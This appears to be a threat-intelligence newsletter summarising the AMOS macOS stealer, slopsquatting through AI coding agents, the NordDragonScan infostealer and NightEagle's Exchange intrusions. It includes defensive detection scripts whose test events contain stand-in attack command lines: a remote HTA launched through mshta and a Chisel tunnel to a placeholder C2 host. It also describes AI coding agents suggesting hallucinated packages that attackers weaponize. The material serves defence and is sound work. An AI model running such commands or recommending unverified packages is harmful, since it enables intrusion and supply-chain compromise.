TRENDING TOPICS JULY 08, 2025

Update: Atomic macOS Stealer Expands Capabilities With Persistent Backdoor, Escalating Threat to macOS Ecosystems 

Earlier this year, we reported on Russian-speaking threat actors using platforms like GitHub and FileZilla to distribute the Atomic macOS Stealer (AMOS), targeting macOS users through fake versions of legitimate software. Back then, AMOS was primarily focused on stealing cryptocurrency wallets, browser data, and login credentials. The latest findings show a clear evolution in the threat: AMOS has now integrated a persistent backdoor, transforming it from a single-use infostealer into a full-fledged remote access tool. This new variant allows attackers to maintain long-term access, execute remote commands, and survive system reboots, drastically increasing the risk profile for macOS users. The malware is spread through cracked software downloads and spear-phishing campaigns, often disguised as legitimate processes to bypass user suspicion and system defenses. Once installed, it bypasses macOS Gatekeeper protections by utilizing a combination of Mach-O binaries, AppleScript, and bash scripts to deeply embed itself within the system. The updated AMOS establishes persistence through hidden LaunchDaemon PLIST files, launching as a disguised “[.]helper” process supported by an “[.]agent” script. It connects to command-and-control servers to receive tasks, exfiltrate data, and issue remote shell commands, with keylogging capabilities reportedly in development. The malware’s infrastructure spans over 120 countries, targeting individuals and companies in the U.S., France, and the U.K. While the original campaigns were linked to financially motivated Russian threat actors, it is unclear if this latest version is the work of the same group or if other actors have adopted and evolved the code. What is clear is that AMOS has evolved beyond basic data theft, posing a significantly broader threat to macOS users, including those in tech, AI, and cloud environments, where Mac devices are commonly used for research and system administration. 
This escalation underscores the necessity for ongoing monitoring and proactive defense strategies against malware-as-a-service threats targeting the macOS ecosystem. 
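One defensive check suggested by the persistence mechanism described above, added here as an example and not code from the original report or from any AMOS sample: parse launchd plists and flag the traits the report names, a hidden (dot-prefixed) plist file and ProgramArguments pointing at hidden paths such as ".helper" or ".agent". The sample plists are constructed for this example; on a real host you would feed it the files under /Library/LaunchDaemons and /Library/LaunchAgents.

```python
import plistlib
import posixpath

# Constructed samples standing in for plists under /Library/LaunchDaemons.
# They are not real AMOS artifacts; they only mirror the traits the report describes.
SAMPLES = {
    "/Library/LaunchDaemons/com.example.updater.plist": plistlib.dumps({
        "Label": "com.example.updater",
        "ProgramArguments": ["/Library/Application Support/Example/updater"],
        "RunAtLoad": True,
    }),
    "/Library/LaunchDaemons/.com.system.helper.plist": plistlib.dumps({
        "Label": "com.system.helper",
        "ProgramArguments": ["/Users/Shared/.helper", "/Users/Shared/.agent"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
}

def hidden_components(path):
    """Return the dot-prefixed components of a POSIX path (e.g. '.helper')."""
    return [p for p in path.split("/") if p.startswith(".") and p not in (".", "..")]

def assess_plist(plist_path, raw):
    """Parse one launchd plist and return the list of suspicious traits found."""
    findings = []
    if posixpath.basename(plist_path).startswith("."):
        findings.append("hidden plist filename")
    try:
        data = plistlib.loads(raw)
    except plistlib.InvalidFileException:
        return findings + ["unparseable plist"]
    programs = list(data.get("ProgramArguments", []))
    if "Program" in data:
        programs.insert(0, data["Program"])
    for prog in programs:
        for comp in hidden_components(prog):
            findings.append(f"hidden path component {comp!r} in {prog}")
    # A hidden job that launchd starts at boot and restarts on exit is the survive-reboot profile.
    if data.get("RunAtLoad") and data.get("KeepAlive") and findings:
        findings.append("auto-start with KeepAlive")
    return findings

def scan(plists=SAMPLES):
    """Return {plist_path: findings} for every plist with at least one finding."""
    report = {}
    for path, raw in plists.items():
        findings = assess_plist(path, raw)
        if findings:
            report[path] = findings
    return report

if __name__ == "__main__":
    for path, findings in scan().items():
        print(path, "->", "; ".join(findings))
```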

Update: Slopsquatting Evolves: AI Coding Agents Now Deliver Malware Through Hallucinated Package Names 

Slopsquatting, a threat we reported several times in the past months, continues to evolve as attackers adapt their delivery techniques. Previously, we explained how AI models can hallucinate fake package names, allowing threat actors to pre-register these names on public repositories such as PyPI and npm. The latest campaigns, however, take this concept further by exploiting AI-powered coding agents—Claude Code CLI, OpenAI Codex CLI, and Cursor AI—that now suggest these hallucinated packages directly in developer workflows. These agents, designed to speed up coding, sometimes fabricate legitimate-looking but entirely fake package names, which attackers quickly publish and weaponize. Developers, relying on AI suggestions during fast-paced tasks, install these packages without realizing the risk, turning their trusted tools into a new infection pathway. Research shows that even with live validation systems in place, these agents occasionally miss edge cases, making slopsquatting an ongoing and dangerous software supply chain risk. This shift from passive package name exploitation to active abuse of coding assistants reflects how attackers are adapting their tactics as AI tools become increasingly popular. In our earlier reporting, we documented the underlying hallucination flaw in language models and how attackers could capitalize on predictable, recurring phantom package names. The latest findings highlight that while the core threat remains the same, the attack surface has expanded through AI-driven workflows where developers often skip manual verification. Defending against this threat requires strict dependency verification, isolated install environments, signed SBOMs, and human approvals for unfamiliar packages. Developers and organizations must recognize that AI tools, while powerful, are still fallible and can introduce serious risks when integrated directly into coding and CI/CD pipelines. 
As attackers refine their techniques, vigilance throughout the software development lifecycle is crucial to mitigating this supply chain threat. 
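The "strict dependency verification" and "human approvals for unfamiliar packages" controls above, as an added example rather than anything from the original reporting: a pre-install gate that parses a requirements file the way an agent might emit it and splits the names into an approved set and a hold list for review. The approved set and the requirements text are constructed for this example; the two unfamiliar names are invented and are not known real packages.

```python
import re

# Constructed allowlist of package names the organization has already vetted
# (in practice an internal mirror or approved-dependency list, not a live registry query).
APPROVED = {"requests", "numpy", "pydantic", "boto3"}

# Constructed requirements as an AI coding agent might suggest them; the last two
# names are invented for this example and are not known real packages.
REQUIREMENTS = """\
requests==2.32.3
numpy>=1.26          # pinned by the team
pydantic[email]~=2.7
example-ai-json-helper==0.1.0
fastparsekit-constructed
"""

NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")

def normalize(name):
    """PEP 503 normalization: case-fold and collapse runs of . _ - into '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()

def parse_requirements(text):
    """Return the normalized project names from a requirements.txt body."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank, comment, or pip option line
        m = NAME_RE.match(line)
        if m:
            names.append(normalize(m.group(1)))
    return names

def gate(text, approved=APPROVED):
    """Split requested packages into (allowed, needs_human_review)."""
    approved = {normalize(a) for a in approved}
    allowed, review = [], []
    for name in parse_requirements(text):
        (allowed if name in approved else review).append(name)
    return allowed, review

if __name__ == "__main__":
    ok, held = gate(REQUIREMENTS)
    print("install:", ok)
    print("hold for human approval:", held)
```

Running installs only from the allowed list inside an isolated environment keeps a hallucinated name from ever reaching pip until a human has looked at it.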

NordDragonScan Malware Campaign Steals Windows Credentials Through Stealthy Infection Chain 

FortiGuard Labs has uncovered an active malware campaign deploying NordDragonScan, an advanced infostealer designed to harvest sensitive data from Windows systems through a stealthy, multi-stage attack chain. The infection process begins when victims click on shortened URLs in phishing emails, often crafted to appear trustworthy, that redirect them to a malicious file-sharing site. From there, victims unknowingly download a RAR archive named with a Ukrainian-themed filename to build credibility and evade suspicion. This archive contains a malicious LNK shortcut, which, when launched, quietly initiates mshta[.]exe to execute a weaponized HTA script hosted on the attacker’s server. This script not only runs PowerShell code from a deceptive file path but also drops the core payload, adblocker[.]exe, into the system’s temporary directory while displaying a harmless decoy document to divert the user’s attention. NordDragonScan establishes a hidden working directory in the local app data folder, where it stages stolen data and configures itself for persistence. The malware employs advanced obfuscation techniques—including XOR-based string encryption and byte-swapping of sensitive code structures—to significantly complicate static analysis and detection by security tools. Once installed, NordDragonScan begins collecting a wide range of data, including login credentials from Chrome and Firefox profiles, documents from key folders, and screenshots captured as “SPicture[.]png.” It communicates with a remote command-and-control server (kpuszkiev.com) using custom HTTP headers, transmitting the stolen data alongside system identifiers, including the victim’s MAC address. To maintain persistence, NordDragonScan creates a registry key (NordStar) under the CurrentVersion\Run path, ensuring the malware re-launches after every reboot. 
Additionally, the malware performs local network reconnaissance using WMI and .NET calls to map nearby devices, gathering hostnames, IP ranges, and system configurations. This level of detail suggests the attackers are preparing for broader lateral movement or follow-on exploitation. Overall, NordDragonScan reflects a well-structured cybercrime operation combining social engineering, fileless execution, persistence techniques, and stealthy exfiltration, posing a serious risk to both individual users and enterprise environments. 

NightEagle APT Targets Exchange Zero-Day to Breach AI, Quantum Tech, and Semiconductor Sectors 

Cybersecurity researchers have identified a previously unknown threat actor, NightEagle (APT-Q-95), actively exploiting a zero-day vulnerability in Microsoft Exchange servers to conduct targeted espionage. The group has been operational since 2023 but surfaced publicly in July 2025 during a cybersecurity conference, where researchers outlined its activity against the government, defense, semiconductor, artificial intelligence, and quantum technology sectors. NightEagle employs a multi-stage attack chain, beginning with a customized .NET loader planted inside the Exchange server’s IIS process. This loader deploys a modified version of Chisel, an open-source tunneling tool, allowing attackers to establish persistent internal network access. Chisel was hard-coded with authentication details and executed regularly via scheduled tasks, providing attackers with reliable outbound connections back to their command-and-control servers. The key flaw lies in the attackers’ ability to extract the machine key from Exchange, which allowed them to exploit a deserialization flaw and gain full control of the server, thereby accessing mailboxes and deploying additional malware. Investigators believe NightEagle’s operations are highly structured and well-resourced, consistent with an advanced persistent threat. Their infrastructure rotates frequently to avoid detection, and attack times—occurring overnight in China—suggest a Western-based origin, though attribution remains unconfirmed. The group’s focus on the AI and semiconductor industries indicates an intent to steal sensitive intellectual property, providing them with potential insight into emerging technologies critical to both commercial and defense sectors. The zero-day vulnerability itself has not yet been publicly assigned a CVE, leaving many Exchange servers potentially exposed until Microsoft releases a patch. 
The discovery of NightEagle underscores the ongoing exploitation of enterprise email servers as high-value entry points into sensitive environments, particularly in industries where scientific data, cutting-edge research, and technical communications are prime targets for cyber espionage. 
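Detection logic for the two Windows-side chains above (NordDragonScan's mshta-launched remote HTA and its NordStar Run key; NightEagle's IIS worker spawning a tunnel and its scheduled task running Chisel), added here as an example and not from either research team: a small rule set evaluated over constructed Sysmon-style events. The event shapes, the host name c2.example.invalid, and the "chisel.exe" file name are assumptions for this example; the report says the tool was modified, so on a real host the binary may be renamed, which is why the parent-process and scheduled-task rules do not depend on the name.

```python
import re

# Constructed events in a Sysmon-like shape (not real logs from either campaign).
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://example.invalid/doc.hta"},            # remote HTA via LNK
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},          # benign local HTA
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NordStar",
     "value": r"C:\Users\u\AppData\Local\Temp\adblocker.exe"},           # persistence from Temp
    {"type": "process", "image": r"C:\Windows\Temp\chisel.exe", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "chisel.exe client c2.example.invalid:443"},             # IIS worker spawns tunnel
    {"type": "task", "name": r"\Microsoft\Windows\Update\Sync",
     "action": r"C:\Windows\Temp\chisel.exe client c2.example.invalid:443"},  # recurring tunnel task
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.I)
URL = re.compile(r"https?://", re.I)
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Users\\[^\\]+\\Downloads)\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(ev):
    """Return the names of every rule one event matches (empty list if none)."""
    hits = []
    if ev["type"] == "process":
        if basename(ev["image"]) == "mshta.exe" and URL.search(ev["cmdline"]):
            hits.append("mshta_remote_hta")
        if basename(ev["parent"]) == "w3wp.exe":
            hits.append("iis_worker_spawned_process")   # Exchange IIS worker should not spawn tools
        if "chisel" in ev["cmdline"].lower():
            hits.append("chisel_tunnel_client")
    elif ev["type"] == "registry":
        if RUN_KEY.search(ev["key"]) and USER_WRITABLE.search(ev["value"]):
            hits.append("run_key_from_user_writable_path")
    elif ev["type"] == "task":
        if "chisel" in ev["action"].lower() or USER_WRITABLE.search(ev["action"]):
            hits.append("scheduled_task_runs_from_user_writable_path")
    return hits

def run(events=EVENTS):
    """Return [(event_index, hits)] for every event that matched at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := evaluate(ev))]

if __name__ == "__main__":
    for i, hits in run():
        print(i, EVENTS[i]["type"], hits)
```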

💡 Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.